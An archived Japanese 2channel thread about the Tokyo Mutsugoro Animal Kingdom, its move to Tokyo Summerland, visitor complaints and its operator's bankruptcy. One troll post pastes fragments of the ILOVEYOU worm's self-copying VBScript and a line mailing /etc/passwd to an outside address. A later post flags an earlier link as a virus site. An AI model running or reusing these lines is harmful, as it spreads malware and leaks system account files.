2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【東京ムツゴロウ動物王国】 Part2

1 :名無しさん@120分待ち:2005/09/12(月) 01:18:45 ID:B2OqQrDr
作家の畑正憲さん(68)=北海道中標津町=が同町と浜中町で運営し
ている「ムツゴロウ動物王国」が、4月から東京都あきる野市の「東京
サマーランド」に移転することが31日、分かった。
 移転後は畑さんも役員として参加するグローカル21(千葉県流山市、
中山晴夫社長)が王国を経営。サマーランドのファミリーパーク内に
「東京ムツゴロウ動物王国」の名称でオープンする。
 動物王国によると、移転は、都会の人たちにも身近に動物と触れ合っ
てもらいたいと畑さんが数年前から計画。畑さんは関係者に「すべての
動物を引き連れ、全員、東京へ進出する」としているが、一部は北海道
に残す可能性があるという。
 ムツゴロウ動物王国は畑さん一家が1971年に浜中町の無人島に移
住してオープン。その後、中標津町に牧場を開設するなどして、現在は
約500ヘクタールの敷地に馬や犬など400匹以上の動物とスタッフ
が暮らしている。

公式HP
http://www.tokyo-mutsugoro-oukoku.co.jp/

前スレ【東京ムツゴロウ動物王国】
http://travel2.2ch.net/test/read.cgi/park/1075516035/l50

関連スレ
犬猫大好き板
『 ム ツ ゴ ロ ウ 』 論
http://hobby8.2ch.net/test/read.cgi/dog/1102633868/l50

陸奥五郎の動物王国の行く末
http://hobby8.2ch.net/test/read.cgi/dog/1049993515/l50

ペット大好き板
〜ムツオウゴロウ動物王国の裏事情ワンワン〜
http://hobby8.2ch.net/test/read.cgi/pet/978882148/l50

2 :名無しさん@120分待ち:2005/09/12(月) 01:40:01 ID:i9VG7B4L
2!!

>1 乙

3 :名無しさん@120分待ち:2005/09/12(月) 08:23:03 ID:e+Nw0CiF
ムツ信者のクロネコタンのホムペ
http://kur0nek0.web.infoseek.co.jp/obon/04/index.html


4 :名無しさん@120分待ち:2005/09/12(月) 08:25:17 ID:e+Nw0CiF
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"



5 :名無しさん@120分待ち:2005/09/12(月) 22:18:16 ID:d17qhJvG
実際にいってみたら、
タバコ吸ってた人にいきなり話し掛けられてビックリ。
犬たちは泥だらけだったし(天然色だそうですが・・・orz)

まぁ・・・おすすめはあんまりできないかな(つд`)


6 :名無しさん@120分待ち:2005/09/13(火) 12:25:43 ID:C/iE7wfW
お隣のセサミプレイスに行ったので、ついでにムツゴロウ行きました。

セサミに飽きて15:30に切り上げました。まだ、早いのでムツゴロウでもと思い入場しました。
セサミプレイスの閉園時間は17時だったので、ムツも17時かなと思いましたが、
入り口でもらったパンフレットを見ると、9月30日までは18時と書いてありました。
まだ閉園まで残り2時間半もあると喜び、入り口のレストランで、ゆっくりと食事をしていました。
さて、それじゃあ見に行くか、と16:30頃、犬猫のエリアに行きました。
しばらく見てまわっていると、17時に閉園時間ですと言われ、
「18時までじゃないのですか? ここに18時までと書いてあるんですけど」とパンフレットを見せると
「あっこれ間違ってますね」とあっさり言われてしまいました。
そんなことなら、レストランでゆっくりなんてしなかったのに。
犬猫エリア以外に、馬とか見たかったのですが、ちょっと後味悪く帰ってきました。

パンフレットくらい正確にしといてよ。
っていうか、閉園まで1時間ちょいなら、入場の時言わないか?普通。
がらがらで、少しでも入場者数稼ぎたいのかな?

7 :名無しさん@120分待ち:2005/09/14(水) 20:41:18 ID:q3Zqv5rt
非常に糞スレの為
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
■■■■氏■■■■■氏■■■■■■■■■■■■■■■■■■■■■
■■■氏氏■■■■■氏■■■■■■■ねねねねねねねねねねねね■■
■■氏氏■■■■■氏氏氏氏氏氏■■■■■■■■■■■■■ねね■■
■氏氏■■氏■■■氏■■■■氏■■■■■■■■■■■■ねね■■■
■■氏■氏氏■■氏氏氏■■氏氏■■■■■■■■■■■ねね■■■■
■■■氏氏■■氏氏■氏氏氏氏■■■■■■■■■■■ねね■■■■■
■■氏氏■■■■■■■氏氏■■■■■■■■■■■ねね■■■■■■
■■氏■■■氏■■■氏氏氏氏■■■■■■■■■■ね■■■■■■■
■氏氏氏氏氏氏■■氏氏■■氏氏■■■■■■■■■ね■■■■■■■
■■■■氏■■■氏氏■■■■氏氏■■■■■■■■ね■■■■■■■
■■氏■氏■氏■■■■氏氏■■■■■■■■■■■ね■■■■■■■
■■氏■氏■氏■■■■■氏氏■■■■■■■■■■ね■■■■■■■
■氏氏■氏■氏■■■■■■■■■■■■■■ねね■ね■■■■■■■
■氏■■氏■■■■氏氏氏■■■■■■■■■■ねねね■■■■■■■
■■■■氏■■■■■■氏氏氏■■■■■■■■■ねね■■■■■■■
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
無事に終了しました。皆様ご愛顧有難う御座いました。 


8 :名無しさん@120分待ち:2005/09/17(土) 21:12:10 ID:94803f3L
今日いってきた。
関東周辺の数ある犬猫系ランドほとんど行ったが
いままでで一番よかった。犬猫が自由にウロウロしてて、自由でよかった。
ちなみにワースト1は某那須の有名なところ。
あっちもムツゴロウ関連だが、あっちは最悪。ぜんぜん犬にさわれない。
ここはかなりいい。また行きます

9 :名無しさん@120分待ち:2005/09/22(木) 20:34:30 ID:mpcflKjz
保守

10 :名無しさん@120分待ち:2005/09/22(木) 20:34:36 ID:mpcflKjz
セーフ

11 :名無しさん@120分待ち:2005/09/26(月) 02:22:55 ID:hLjze3hV
age

12 :名無しさん@120分待ち:2005/09/28(水) 22:43:25 ID:ZdmjN6QY
アンチムツサイトハケーン!
http://mios.20m.com/

13 :名無しさん@120分待ち:2005/10/01(土) 23:56:01 ID:2idCmnSn
いきなり話しかける不審者の正体はどうも、王国の社長って言う噂

14 :名無しさん@120分待ち:2005/10/02(日) 01:18:06 ID:2lYmBbn2
あの内容なら、一時間もあればおつりが来るから、
一時間前だろうがなんだろうが正規の料金で入場
するのが当たり前と従業員も思ってるんだろうww
ちなみに歩いて馬のところまで只歩くだけで15〜20分は
かかるけどねw
でも、よくあれで一年もったよね、そういう意味では大したものだと思うよ
そろそろ、リピーターも飽きて来る時期だし来年の今頃はどうなってるのか
違う意味で行く末が楽しみっちゃ楽しみかも。


15 :名無しさん@120分待ち:2005/10/04(火) 00:53:51 ID:ln8dD2rF
ホント良くもまあ一年も持ったもんだ。

これからどうすんだろ。
余計なお世話だが。

16 :名無しさん@120分待ち:2005/10/05(水) 18:33:08 ID:fqmncbmz
今年中にあぼーんじゃね?

17 :名無しさん@120分待ち:2005/10/05(水) 22:50:25 ID:5JBK9yPp
今日、テレビにムツゴロウさん出てたw

18 :名無しさん@120分待ち:2005/10/10(月) 01:45:14 ID:feHtSQJg
age

19 :名無しさん@120分待ち:2005/10/19(水) 02:20:35 ID:64DC0C4M
     


20 :名無しさん@120分待ち:2005/10/19(水) 17:08:31 ID:HTefLo4W
>>17
どうせコレだろw
いきいき健康○レビショッピング・アマ○ンビッグパワー
ttp://www.shizenkyosei.co.jp/shop/abp/index.html

この手の仕事はかなりの額のギャラが貰えるらしいからな。


21 :名無しさん@120分待ち:2005/10/21(金) 00:13:19 ID:fJDnWHH4
儲けた金でムツ王国助けてやれよw

22 :名無しさん@120分待ち:2005/10/22(土) 11:07:26 ID:MGY0TU8r
その程度ではもう、助けられるような状態じゃないって話ww

23 :名無しさん@120分待ち:2005/10/22(土) 21:00:51 ID:/4fqUTcK
あげ

24 :名無しさん@120分待ち:2005/10/28(金) 19:44:28 ID:ClFIsFtB
つか何でつぶれないの?

25 :名無しさん@120分待ち:2005/10/28(金) 21:29:34 ID:YqCtE477
アゲ・・・・

26 :名無しさん@120分待ち:2005/11/07(月) 09:25:49 ID:Idn3wUXi
いろんなところに迷惑かけてるから、潰れない・・てか潰せないってのいうのww


27 :名無しさん@120分待ち:2005/11/09(水) 04:21:21 ID:Mv1dQ1Gv
あげ

28 :名無しさん@120分待ち:2005/11/12(土) 03:04:04 ID:ZZp7YiHy
age

29 :名無しさん@120分待ち:2005/11/12(土) 17:35:13 ID:fRwy/K1j
age

30 :名無しさん@120分待ち:2005/11/17(木) 09:40:35 ID:pBuZ7KTu
アンチムツサイト 
http:///daylinews.bravehost.com/Society/051106-00000107-kyodo-ent.html

31 :名無しさん@120分待ち:2005/12/19(月) 01:49:33 ID:ZY3cMcEu
age

32 :名無しさん@120分待ち:2006/01/10(火) 01:22:29 ID:y5TrXkUm
sage


33 :名無しさん@120分待ち:2006/01/10(火) 17:19:38 ID:06N1gfW8
ありえない。不思議ー

http://news19.2ch.net/test/read.cgi/newsplus/1136878734/l50

34 :名無しさん@120分待ち:2006/01/14(土) 18:20:17 ID:AQFLB7GH
客をよぶためのやらせ??


35 :名無しさん@120分待ち:2006/01/22(日) 16:38:28 ID:90DRGUdT
>>33 のコピペ
★東京ムツゴロウ動物王国:なぜ仲が良いの? ハムスターと蛇“同居” /東京

・犬や猫などと触れ合える施設「東京ムツゴロウ動物王国」(あきる野市上代継)に、
 “天敵”の蛇と暮らすハムスターがいる。蛇の餌用に、と与えられたハムスターだが、
 蛇は食べずに「仲良くなった」という。

 体長1メートル20センチ超の雄のアオダイショウの「アオちゃん」(推定2歳)と、体長
 約9センチの雌のハムスター「ごはん」(同6カ月)が、プラスチック製の飼育槽
 (縦約30センチ、横約35センチ、高さ約25センチ)の中で一緒に過ごしている。
 同王国によると、アオちゃんは昨年9月半ば、同王国内で猫と格闘中、職員に捕獲された。

 食欲がなかったため、1カ後の同10月中旬、職員がペットショップから餌用にハムスターを
 購入してきた。
 ところが、好物なはずのハムスターを食べるどころか、気に入った様子。ハムスターの
 方も長いとぐろの上で昼寝するなど恐れる様子はなく、まるでじゃれるようにアオちゃんを
 引っかくことも。ハムスターは先月、「ごはん」と命名された。アオちゃんは餌用の冷凍
 マウスを食べている。

 現在、2匹は同王国内の雑居館にいる。「まるで(ヤギとオオカミの友情を描いたアニメ
 映画の)『あらしのよるに』のようだ」と来園者たちに評判になっており、冬休み中、両親と
 遊びに来ていた板橋区の保育園児、木下令也ちゃん(6)は「ありえなーい。ふしぎー」と
 目を丸くしていた。

 同王国職員の野村恭太さん(28)は「アオダイショウにとって、ごはんのようなハムスターは
 食べるのにちょうどいい大きさ。どうして仲が良いのか全く分かりません」と話している。

 http://headlines.yahoo.co.jp/hl?a=20060110-00000058-mailo-l13

36 :名無しさん@120分待ち:2006/01/22(日) 23:30:40 ID:SNTKgNJA
まぁ、今蛇は冬眠してる時期だしね、食欲無いんじゃないの?
この程度の話を映画の話と引っ掛けたところで、来園者なんかふえないよ〜
しかし、餌用に飼ってきたから「ごはんちゃん」か・・・もうちょっとなんかヒネリ
ないのかな・・・センス無いね
まぁ、田舎の人のあつまりだから精一杯かその程度が・・・(爆)


37 :名無しさん@120分待ち:2006/01/22(日) 23:36:11 ID:7GSWkk26
ハムスターが毎日日替わりで同居してるだけでしょ。

38 :名無しさん@120分待ち:2006/01/23(月) 17:20:48 ID:KmR8Rjyt
もう、すでに何匹か食べられて身代わり君がそのたびに中に入るほうに
一票! 映画で前科ありだしww

39 :名無しさん@120分待ち:2006/01/29(日) 22:11:47 ID:T0QegMt9
このじいさん、麻雀もすんの?

40 :名無しさん@120分待ち:2006/02/20(月) 17:45:30 ID:p0N3/Kqd
sage

41 :名無しさん@120分待ち:2006/04/17(月) 10:58:00 ID:DR+o/qiT
>>39
そっちの方も有名だよ

42 :名無しさん@120分待ち:2006/04/21(金) 01:32:48 ID:cZrFRjWU
ちょい前にFMに出てたな

43 :名無しさん@120分待ち:2006/04/27(木) 15:00:10 ID:bh4C1dFe
那須動物王国が好きな人いませんか?昨日リニューアルしてはじめていったのですが、大好きなサモエドのリッキーが激やせして、あんなに元気だったのに、全然元気がなく死にそうな状態でした・・・。可哀想で涙がでてきました。見てられませんでした・・・。

44 :名無しさん@120分待ち:2006/05/18(木) 07:00:46 ID:C5NH5aJZ
>>12 はウイルスサイト!危険!

45 :名無しさん@120分待ち:2006/05/30(火) 16:17:12 ID:cCoEUBn+
http://ex13.2ch.net/test/read.cgi/soccer/1148693600
関連スレ

46 :名無しさん@120分待ち:2006/06/21(水) 00:51:51 ID:EhXiD7Ht
種族を超えた愛!青大将とハムスターのその後
http://news.livedoor.com/webapp/journal/cid__2104366/detail


47 :名無しさん@120分待ち:2006/06/28(水) 09:10:46 ID:h0o8LRJS
あげ

48 :名無しさん@120分待ち:2006/10/15(日) 08:58:52 ID:QQ2rlLkh
もぅだめポ。

49 :名無しさん@120分待ち:2006/10/15(日) 09:00:44 ID:jucdpRs0
むりぽ

50 :名無しさん@120分待ち:2006/10/15(日) 11:22:57 ID:89YX9kch
 アボーンするみたいだよ。

ttp://news19.2ch.net/test/read.cgi/newsplus/1160862257/l50

51 :名無しさん@120分待ち:2006/10/15(日) 18:14:39 ID:+ql/qoyk
閑古鳥鳴きっぱなしだったからね・・・
潰れて当然かと。

52 :名無しさん@120分待ち:2006/10/15(日) 18:15:33 ID:Dpe7lE6r
最近招待券がヤフオクに無いと思ったらこの有様か

53 :名無しさん@120分待ち:2006/10/15(日) 18:36:02 ID:niemYvmc
>>50の一文で
…との思いがあり、 の部分を
   思いあがり と読んでしまった。


54 :名無しさん@120分待ち:2006/10/15(日) 18:53:51 ID:Y2TuOlDA
北海道時代から王国に近づいただけで恫喝された上に虐待者使いしてたのは有名だから
破産すると聞いてもやっぱりなって感じ
いくら車を動物扱いしても8億なんて返せるわけないし
終わったね

55 :名無しさん@120分待ち:2006/10/15(日) 20:07:30 ID:Dpe7lE6r
おいおい、東京セサミプレイスもどさくさに紛れて閉園だとよ?
http://www.sesameplace.co.jp/news/news_d.php?no=119

56 :名無しさん@120分待ち:2006/10/16(月) 11:13:40 ID:NmQ9khxd
運営会社が破産するだけで、本体は生き残るみたいだよ。
ホームページよく読めよ。

57 :名無しさん@120分待ち:2006/10/16(月) 11:50:52 ID:f0SwjK4p
地味にクリケット

58 :名無しさん@120分待ち:2006/10/16(月) 13:13:30 ID:1QeE7Iq9
中間搾取会社があぼーん、と

サマーランドはお馬さんな会社ナンだから動物は大切にしないとな

59 :名無しさん@120分待ち:2006/10/19(木) 00:16:12 ID:K4JSoSaO
TVでやってたけど周りのなんとか市の人もここの存在する知らないって言ってたよ

60 :名無しさん@120分待ち:2006/10/19(木) 22:01:01 ID:QDha707g
               iヽ 
  ! !、      ___        / ノ 
  ヽ ヽ、 ,彡フ ̄  ̄ヽミミ、/ / 
   ヽ フ''         く /   
    _ 〉'           ヽ/,_ 
   (ヽi,      /;ヽ       i/ ) 
    i ! ,,_____ノ、i;;iヽ、_____、 i i  同じ板にコピペするとそのままだけど
     ! 'ヽ__●ノ' 'ヽ_●,ノ ,ノ i  違う板にコピペするとかわいい美少女の顔
    !、jヽ、 ,-   ;; -、 / _ノ  に変わる摩訶不思議な鬼コピペ。
     〉 /,、''`ヽ__/` ' ,、'  )  
     '!, ヽ`t-,、__, -'イ/  /
     ヽ ヽt,=,='='=イi  /  
      \ `'"~⌒~"' ノ   
        `-- ^-- '  

61 :名無しさん@120分待ち:2006/10/21(土) 00:02:58 ID:P/7lvTK6
もうぬるぽ

62 :名無しさん@120分待ち:2006/10/22(日) 16:41:19 ID:swSxbudn
               iヽ 
  ! !、      ___        / ノ 
  ヽ ヽ、 ,彡フ ̄  ̄ヽミミ、/ / 
   ヽ フ''         く /   
    _ 〉'           ヽ/,_ 
   (ヽi,      /;ヽ       i/ ) 
    i ! ,,_____ノ、i;;iヽ、_____、 i i  同じ板にコピペするとそのままだけど
     ! 'ヽ__○ノ' 'ヽ_○,ノ ,ノ i  違う板にコピペするとかわいい美少女の顔
    !、jヽ、 ,-   ;; -、 / _ノ  に変わる摩訶不思議な鬼コピペ。
     〉 /,、''`ヽ__/` ' ,、'  )  
     '!, ヽ`t-,、__, -'イ/  /
     ヽ ヽt,=,='='=イi  /  
      \ `'"~⌒~"' ノ   
        `-- ^-- '

63 :名無しさん@120分待ち:2006/10/25(水) 21:52:47 ID:AKxKESnq
動物園水族館板が出来ました
今後は遊園地板での動物園の話題は板違いになります
http://travel2.2ch.net/zoo/

64 :名無しさん@120分待ち:2006/10/25(水) 23:01:42 ID:wAZve7AK
がんばって!!

65 :名無しさん@お腹いっぱい。:2006/10/27(金) 00:31:53 ID:tXg+o/9O0
広島で犬惨殺事件もあったことだし
こっちは動物だけは何とかしてくれ

66 :名無しさん@お腹いっぱい。:2006/11/02(木) 20:42:04 ID:sVjD1z9Y0
閉園危機だね

67 :あきる野市:2006/11/03(金) 01:20:12 ID:eKJspfDe0
http://www.akiruno.go2.jp/

68 :名無しさん@お腹いっぱい。:2006/11/10(金) 14:47:49 ID:L3XV+DwG0
北海道にいれば良かったのに

69 :名無しさん@お腹いっぱい。:2006/11/11(土) 23:33:03 ID:iFHvO1WL0
生き残れ

70 :名無しさん@お腹いっぱい。:2006/11/18(土) 15:46:01 ID:brApT5uA0
内山クリニック長谷川内科南輪内診療所朝長医院中島整形外科クリニック斉藤外
科シオン診療所今成医院伊奈病院埼玉県立がんセンタ
ー埼玉県立精神医療センターひらの歯科医院騎西クリニック病院富安医院埼玉医
療生活協同組合騎西ふれあいクリニック堀内医院まび
き整形外科神田後藤クリニックいとう整形外科木村クリニック市川医院武川診療
所谷病院大玉診療所昭和村国民健康保険診療所いずみ
整形外科クリニッククリニックかしまあきら整形外科たかはしクリニックこじま
内科額賀医院よこぎ内科胃腸科クリニック平中央医院
いわき市国民健康保険田人診療所小西医院千代田医院安村外科内科診療所白波瀬
医院岡田整形外科医院大樋医院はしひら医院今井診療
所三聖病院京都第一赤十字病院橋本内科医院市立芦別病院北海道立本岐診療所永
野医院たかの耳鼻咽喉科内山クリニック長谷川内科南
輪内診療所朝長医院中島整形外科クリニック高月整形外科斉藤外科シオン診療所
中野中央病院佐藤医院野崎整形外科医院高木医院木村
クリニック洋向台クリニックくさの内科・眼科すけがわ内科クリニック額賀医院
草野医院下遠野内科胃腸科クリニック松崎内科医院中
野内科クリニック箱崎医院阿部内科医院おおくぼ胃と腸・内科クリニック安島内
科クリニック遠藤邦夫医院山口医院

71 :名無しさん@お腹いっぱい。:2006/11/25(土) 05:22:11 ID:ri9ZK3Vx0
>>69
そう思うなら月に1度くらい行ってやれ。

72 :名無しさん@お腹いっぱい。:2006/11/28(火) 15:59:42 ID:d9BUyWhC0
ムツゴロウさんが王国崩壊を否定

東京都あきる野市のサマーランド内「東京ムツゴロウ動物王国」の運営会社が今月にも破産することが明らかになった問題で、ムツゴロウこと作家の畑正憲氏(71)が王国崩壊を否定した。
04年7月に北海道から移転後、運営してきた同社が約8億円の負債を抱えて破たん
。今年6月末にサマーランドから契約の打ち切りと立ち退きを求められ、その後は畑氏が運営を引き継いだとされている。
畑氏は27日、都内で映画「名犬ラッシー」(12月23日公開)の試写会に出席後、「今は運営組織がない状態。
今年中に新たな組織をつくるプランをまとめて来年には再スタートしたい」と存続を強調した。
前運営会社については憤りを隠さず「はらわたが煮えくり返るね。運営はオレがやるしかない」。
サマーランドに対する土地賃料の滞納、従業員の給料未払いも指摘されたが「滞納もないし、給料も大丈夫。サマーランドに聞けば分かります」と説明した。
この日は王国に住む犬10匹を「同席」させた。「動物を飢えさせない『アニマルファースト』が私の哲学。自分が食べられなくても動物は食べさせる」と力強かった。

http://www.nikkansports.com/entertainment/p-et-tp0-20061128-122758.html


73 :名無しさん@お腹いっぱい。:2006/11/28(火) 16:19:54 ID:BaRre2kf0
土地代はともかく、給料の遅配はサマーランドじゃわかるめえ?
それとも、実質運営も金もサマーランドが握ってるって事?
サマーランドの経営になればそりゃ、土地代は要らないよな
みんな、表向きの猿芝居に騙されちゃ駄目駄目ww
新しい運営組織かぁ・・・(大爆)

74 :名無しさん@お腹いっぱい。:2006/11/28(火) 18:05:24 ID:qrb3Hi1S0
今は ムツゴロウ事務所が運営代行してるけど
新運営組織はどうなるんだろう?
ムツゴロウとサマーランドの合弁会社?

75 :名無しさん@お腹いっぱい。:2006/11/29(水) 14:46:51 ID:EdsdZGWN0
合弁じゃ何も変わんないだろうね、完全にサマーランドの経営で運営も全部
サマーランドがやらなきゃ何も変わらんでしょうね
今いるスタッフのレベルじゃ客が満足できるような運営できないのは、この
2年ではっきりしてるから、今いるスタッフは運営から一切手を引いて
飼育員というスタンスで経営、運営はサマーランドなりきちんとノウハウのある
ところに任せないと再建は無理だろうな

76 :名無しさん@お腹いっぱい。:2006/12/07(木) 15:24:15 ID:/Z1eQkEq0
【パチンコ】ムツゴロウさん、パチンコ新機種発表会で牛の乳を直接飲む 『CRムツゴロウの動物王国』
http://news18.2ch.net/test/read.cgi/mnewsplus/1165412206/

1 名前:THE FURYφ ★[] 投稿日:2006/12/06(水) 22:36:46 ID:???0
2006年12月6日、EBIS303(渋谷区・恵比寿)にて株式会社三洋物産、株式会社三洋販売主催
『CRムツゴロウの動物王国』新機種発表会が開催された。本機種は三洋グループ初のタイアップ機種
となっており、その第1弾は動物をこよなく愛することで親しまれている”ムツゴロウさん”こと、
畑正憲さんとのコラボレーション機種。

登場キャラクターは新キャラクターの若菜ちゃんや可愛らしい動物たちをはじめ、ムツゴロウさんが
様々な動物に扮して登場。リーチ演出では「乳絞りリーチ」、「ポエムリーチ」の他、激アツの「よしよしリーチ」を
搭載するなど、ムツゴロウワールドを十分に堪能できる機種となっている。また液晶画面右上には
ムツゴロウさんの大型役物も搭載されており、液晶演出と連動する動きは必見である。

挨拶後、三洋イメージガールミスマリンちゃんの小倉遥さん、中村果生莉さんが『CRムツゴロウの動物王国』に
登場する若菜ちゃんの衣装を着て登場し、多くのプレス関係者に向けて新機種のお披露目や機種紹介を行った。

続いて本日の主役であるムツゴロウさんが登場すると会場内からは無数のフラッシュがたかれた。
ムツゴロウさんはおなじみの名ゼリフ「よ〜し、よしよしよし」と言いながら新機種を撫でるパフォーマンスを
見せ、会場を沸かせた。

和やかに進んでいた発表会中、突然「モォ〜〜〜ウ!」と、どこからともなく動物の鳴き声が…。周りを見渡す
プレス関係者たちを前に「今日ですね私たちの仲間を連れてきました」と語るムツゴロウさん。そして、な、なんと
ステージ横から本物の乳牛が登場したのであった!

本物の乳牛が登場するとミスマリンちゃんたちによる乳しぼり体験が行われ、ムツゴロウさんのアドバイスのもと、
上手に乳絞りをする小倉さんと中村さん。そしてこの後、ムツゴロウさんが牛の乳を直接飲むパフォーマンスを披露!
ミルクで顔がビシャビシャになっていたムツゴロウさんであったが、満足そうな表情を見せたのが印象的であった。

http://www.pachinko-club.com/club/news.php?id=200612061620_0b

77 :名無しさん@お腹いっぱい。:2006/12/11(月) 18:23:34 ID:m+klNriS0
【緊急告知】
BBS_MAX_MENU_THREAD=40
この板は40スレまで残して それ以下のスレは削除されるそうです
スレが消えて欲しく無い場合は 何か書き込みをして保守ageをしておいてください
スレッド一覧http://travel2.2ch.net/zoo/subback.html

ただし 何の内容も無く ageとか保守あげ とかしか書いて無い書き込みは
ひろゆきが最も嫌いな行為なので(2ちゃん永久アク禁になりたい人以外は)
絶対にやらないでください 危険です
 
この件などに関しての臨時集会所
↓自治質問新スレ依頼総合案内所
http://travel2.2ch.net/test/read.cgi/zoo/1161779275/l50

78 :名無しさん@お腹いっぱい。:2006/12/15(金) 09:13:19 ID:bZuar8+n0
あれ? 王国擁護のみなさん・・・もうおわり?


79 :名無しさん@お腹いっぱい。:2007/01/06(土) 13:44:04 ID:M9PInWnk0
ムツゴロウさんがパチンコに

エサ代稼ぐのに必死だ

80 :名無しさん@お腹いっぱい。:2007/01/12(金) 09:10:46 ID:2T9CJax00
ムツゴロウ王国、冬の料金大人1000円になったらしいやっと適正価格か?
まだ、高いかも・・・て話も(爆) しかも安くする分エリア限定とか
訳のわからんこと書いてある、しかも内容は電話でお問い合わせください
だってさぁ・・・・
ネット環境にない人は、知らずに行ってまた騙されたって思う人いるだろ
ほんと・・とことん商売下手っていうか、早い話自分たちの都合しか
考えて無いって言うことか(笑)

相変わらず見せてあげてる感満載の運営ですね

ムツゴロウさんがテレビでまくり〜の、パチンコ屋にキャラうり〜ので
結構なお金できたし喉元すぎればなんとやら・・・ですか(笑)

そうそう、料金、営業時間を濃縮・・・てあるんですが意味わからないので
常連さんか関係者の方、見てたら教えてください。
短縮とか圧縮とかなら馬鹿な私にもなんとか理解できるんですけど・・・




81 :名無しさん@お腹いっぱい。:2007/01/12(金) 11:07:21 ID:w63WCiBE0
行く気がおこらん

82 :名無しさん@お腹いっぱい。:2007/01/12(金) 12:33:44 ID:yBoWdZf5O
ムツゴロウ本人がいるなら行ってみてもいいかな…ゴメンナサイ嘘ついてました。

83 :名無しさん@お腹いっぱい。:2007/01/12(金) 16:23:56 ID:XIRYGmtC0
東京にやってこないで
北海道に残ってれば
今頃旭川の動物園との相乗効果で
儲かりまくりだったのに

84 :名無しさん@お腹いっぱい。:2007/01/12(金) 23:13:36 ID:2T9CJax00
相乗効果? ありえないな・・・クオリティの差がありすぎる


85 :名無しさん@お腹いっぱい。:2007/01/14(日) 15:54:15 ID:rLU9JfSF0
今 知床と旭山動物園の相乗効果がすごいらしいぞ

86 :名無しさん@お腹いっぱい。:2007/01/15(月) 01:24:30 ID:NvYEGZkU0
(鯖移転に伴いアドレス変更になったのでリンク修正)
・1つのスレだけでなく動物園・水族館板の他のスレも見て回ってね
スレを立てるまでもない動物園・水族館を語るスレ http://travel3.2ch.net/test/read.cgi/zoo/1164280748/l50
世界の動物園 http://travel3.2ch.net/test/read.cgi/zoo/1161742052/l50
水族館大好き Part4 http://travel3.2ch.net/test/read.cgi/zoo/1133863744/l50
北海道の動物園水族館総合http://travel3.2ch.net/test/read.cgi/zoo/1161949322/l50
関東地方の動物園水族館総合 http://travel3.2ch.net/test/read.cgi/zoo/1161939654/l50
近畿地方の動物園水族館総合 http://travel3.2ch.net/test/read.cgi/zoo/1161958243/l50
中国・四国・九州地方・沖縄の動物園水族館 http://travel3.2ch.net/test/read.cgi/zoo/1161950679/l50

動物園や水族館の専用スレなどスレッド一覧
http://travel3.2ch.net/test/read.cgi/zoo/1164280748/195-202n

・2chスレ検索
1  http://find.2ch.net/ 2 http://ttsearch.net/ 3 http://2chs.net/i/2chs.cgi

キーボードのCtrl[コマンド]キーとFキーを同時押しすると ページ内検索機能が使えます
この機能でスレッド一覧から目的のスレを探したり スレで必要な情報を探すと便利です

【注意】
最近 この板に昔からいる荒らしが 自分のスレの誘導コピペをすることがありますが
(何も知らない人が それだけ見ると一見正しいことを言ってるように見える)
荒らしの隔離スレですので絶対に行かないようにしてください
ちなみにこのスレです↓
【マターリ】動物園・水族館 総合【語ろうぞぅ】
travel3.2ch.net/test/read.cgi/zoo/1161775574/

87 :名無しさん@お腹いっぱい。:2007/01/15(月) 12:34:13 ID:0anGHPLWO
旭山動物園行ったけど、普通だった。

88 :名無しさん@お腹いっぱい。:2007/01/15(月) 22:13:48 ID:jyEAqfXv0
>.87
誤爆?

【・ω・】 旭川市旭山動物園 その3 【・ω・】
http://travel3.2ch.net/test/read.cgi/zoo/1157743770/l50

89 :ニート:2007/01/18(木) 08:39:53 ID:nUP9Q+RJO
CMの最後の場面で鳥の格好したムツゴロウさんが【おえ、おっお〜】言うの、笑える

90 :動物だいすき:2007/01/18(木) 13:31:18 ID:jGOiJARw0
【無料動画】かわいい 動物たちの動画をいっぱい見つけたよ!

たくさんの動物がいるから、動物大好きな人は ぜひ見てね。 (^-^*)。
http://www.pandoratv.jp/search/search.asp?mode=total&src_keyword=%93%AE%95%A8%89%80

91 :名無しさんお腹いっぱい。:2007/02/01(木) 20:30:42 ID:CpFnM0lM0
age


92 :名無しさん@お腹いっぱい。:2007/02/04(日) 20:30:28 ID:hQBLQfLl0
スタッフがパチンコやれるほど給料貰えんなら、まともにアルバイト雇え
何がウンコ拾い隊じゃ、自分たちの面倒な仕事押し付けるためだけじゃん

破産宣告だかなんだかしらんけど、色んなとこに迷惑かけて負債から逃げて
喉元すぎたら浮かれ倒しやがって、さっさと潰れろこんなとこ

93 :名無しさん@お腹いっぱい。:2007/02/05(月) 16:45:11 ID:x4UnKklDO
ムツゴロウ王国の連絡先教えて!

94 :名無しさん@お腹いっぱい。:2007/02/08(木) 10:57:16 ID:quvU5P060
自分でぐグリなさい


95 :名無しさん@お腹いっぱい。:2007/03/29(木) 02:58:52 ID:fvY95mGB0
まだやってるんだ!?

28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)